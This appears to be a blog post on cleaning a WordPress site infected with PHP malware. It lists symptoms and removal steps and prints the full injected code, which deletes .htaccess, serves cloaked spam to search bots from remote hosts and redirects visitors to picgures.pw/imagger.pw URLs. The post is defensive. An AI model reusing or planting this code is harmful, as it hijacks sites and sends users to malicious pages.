How to find it: enter command --
sudo grep -r 'user_agent_to_filter' --include *.php /var/www
Problem:
1) The website may be tagged with “This site may be hacked” in Google search results.
2) The website with HTTPS will return error 500.
3) The website with non-HTTPS will be treated as a dangerous page by some Antivirus Software since it being injected an iframe to redirect a user to another website.
Solution:
- Update WordPress update plugin (wordfence)
- Change folder permission to 775 (or follow the original repository’s permission setting)
- Enforced SSL
- Delete all the infected files (You can find them all using sudo grep -r ‘user_agent_to_filter’ --include *.php /var/www/html)
- Use Cloudflare 🙂
Below code is the injected content, Other websites also mentioned this malware. I will attached the links below.
<?php
// Below infected code is malware! Do not use it
$f1 = ".ht"; $f2 = "acc"; $f3 = "ess";
$ff = $f1.$f2.$f3;
if (file_exists($ff)) chmod ($ff, 0777);
if (file_exists($ff)) unlink ($ff);
$cache_folder = "wtuds";
$template_folder = "nptoris";
$user_agent_to_filter = array( '#Ask\s*Jeeves#i', '#HP\s*Web\s*PrintSmart#i', '#HTTrack#i', '#IDBot#i', '#Indy\s*Library#',
'#ListChecker#i', '#MSIECrawler#i', '#NetCache#i', '#Nutch#i', '#RPT-HTTPClient#i',
'#rulinki\.ru#i', '#Twiceler#i', '#WebAlta#i', '#Webster\s*Pro#i','#www\.cys\.ru#i',
'#Wysigot#i', '#Yahoo!\s*Slurp#i', '#Yeti#i', '#Accoona#i', '#CazoodleBot#i',
'#CFNetwork#i', '#ConveraCrawler#i','#DISCo#i', '#Download\s*Master#i', '#FAST\s*MetaWeb\s*Crawler#i',
'#Flexum\s*spider#i', '#Gigabot#i', '#HTMLParser#i', '#ia_archiver#i', '#ichiro#i',
'#IRLbot#i', '#Java#i', '#km\.ru\s*bot#i', '#kmSearchBot#i', '#libwww-perl#i',
'#Lupa\.ru#i', '#LWP::Simple#i', '#lwp-trivial#i', '#Missigua#i', '#MJ12bot#i',
'#msnbot#i', '#msnbot-media#i', '#Offline\s*Explorer#i', '#OmniExplorer_Bot#i',
'#PEAR#i', '#psbot#i', '#Python#i', '#rulinki\.ru#i', '#SMILE#i',
'#Speedy#i', '#Teleport\s*Pro#i', '#TurtleScanner#i', '#User-Agent#i', '#voyager#i',
'#Webalta#i', '#WebCopier#i', '#WebData#i', '#WebZIP#i', '#Wget#i',
'#Yandex#i', '#Yanga#i', '#Yeti#i','#msnbot#i',
'#spider#i', '#yahoo#i', '#jeeves#i' ,'#google#i' ,'#altavista#i',
'#scooter#i' ,'#av\s*fetch#i' ,'#asterias#i' ,'#spiderthread revision#i' ,'#sqworm#i',
'#ask#i' ,'#lycos.spider#i' ,'#infoseek sidewinder#i' ,'#ultraseek#i' ,'#polybot#i',
'#webcrawler#i', '#robozill#i', '#gulliver#i', '#architextspider#i', '#yahoo!\s*slurp#i',
'#charlotte#i', '#ngb#i', '#BingBot#i' ) ;
if ( !empty( $_SERVER['HTTP_USER_AGENT'] ) && ( FALSE !== strpos( preg_replace( $user_agent_to_filter, '-NO-WAY-', $_SERVER['HTTP_USER_AGENT'] ), '-NO-WAY-' ) ) ){
$isbot = 1;
}
if( FALSE !== strpos( gethostbyaddr($_SERVER['REMOTE_ADDR']), 'google'))
{
$isbot = 1;
}
if ($isbot)
{
$myname = $cache_folder."/".$_GET["jgyhdhuy"];
if (file_exists($myname))
{
$html = file($myname);
$html = implode($html, "");
echo $html;
exit;
}
$template = scandir($template_folder);
$template = $template[rand(2,sizeof($template)-1)];
$tpl = $template_folder."/".$template;
$tpl = file($tpl);
$keyword = str_replace("-", " ", $_GET["jgyhdhuy"]);
$keyword = chop($keyword);
$keyword = ucfirst($keyword);
$query_pars = $keyword;
$query_pars_2 = str_replace(" ", "+", chop($query_pars));
$query_pars_2 = mb_strtolower($query_pars_2);
$text = "";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://picgures.pw/story2.php?q=$query_pars_2&pass=qwerty8");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$text = curl_exec($ch);
curl_close($ch);
if (strlen($text)<1000)
{
for ($page=1;$page<145;$page=$page+10)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "https://www4.bing.com/search?q=$query_pars_2&first=$page");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 1);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2);
//curl_setopt($ch, CURLOPT_USERAGENT,"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
$result = curl_exec($ch);
curl_close($ch);
//echo $result;
preg_match_all ("#</div><p>(.*)</p></div>#iU",$result,$m);
foreach ($m[1] as $a) $text .= $a;
}
$text = str_replace("...", "", $text);
$text = strip_tags($text);
$text = str_replace(" ", " ", $text);
$text = str_replace(" ", " ", $text);
$text = str_replace(" ", " ", $text);
$text = str_replace(" ", " ", $text);
$text = str_replace(" ", " ", $text);
$text = str_replace(" ", " ", $text);
$text = str_replace(" ", " ", $text);
$text = explode(".", $text);
shuffle($text);
$text = array_unique($text);
$text = implode(". ", $text);
}
$html = implode ("\n", $tpl);
/*
$titlename = $_SERVER['SERVER_NAME'];
$titlename = explode(".", $titlename);
$titlename = strtoupper($titlename[0]);
if (strlen($titlename)>1) $html=str_replace("<title>{keyword}</title>", "<title>$keyword | $titlename</title>", $html);
*/
$html = str_replace("{keyword}", $keyword, $html);
$html = str_replace("{manytext_bing}", $text, $html);
$out = fopen($myname, "w");
fwrite($out, $html);
fclose($out);
echo $html;
}
if([email protected]$isbot)
{
$keyword = str_replace("-", " ", $_GET["jgyhdhuy"]);
$keyword = str_replace(" ", "+", $keyword);
$ref = $_SERVER["HTTP_REFERER"];
$d = $_SERVER["HTTP_HOST"];
$mykeys = $_GET["jgyhdhuy"];
header("Location: http://imagger.pw/sf/77?d=$d&mykeys=$mykeys");
exit;
}
?>
Other relevant resources:
http://chensd.com/2011-09/a-wordpress-trojan-analyst.html (simplified chinese)
https://stackoverflow.com/questions/44534667/wordpress-website-hacked-according-to-google-is-it-really
https://blog.sucuri.net/2012/06/understanding-conditional-malware-ip-centric-variation.html
https://www.biaodianfu.com/site-hacked.html (simplified chinese)